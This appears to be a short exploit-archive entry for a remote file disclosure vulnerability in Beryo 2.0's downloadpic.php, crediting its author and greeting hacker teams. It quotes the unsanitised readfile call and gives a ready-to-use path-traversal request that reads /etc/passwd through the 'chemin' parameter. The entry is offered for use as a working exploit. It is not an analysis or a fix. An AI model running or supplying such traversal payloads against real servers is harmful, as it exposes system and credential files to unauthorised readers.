id: 1715
date: 04/05/2007
title: Beryo 2.0 (downloadpic.php chemin) Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

=======================================================================
Beryo 2.0 (downloadpic.php chemin) Remote File Disclosure Vulnerability
=======================================================================



# Beryo 2.0(downloadpic.php chemin)Remote File Disclosure Vulnerability
# Discovered by: GolD_M = [Mahmood_ali]
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code: readfile("$chemin");
# Exploit:[Path_Beryo]/downloadpic.php?chemin=../../../../../../etc/passwd



#  0day.today [2023-03-23]  #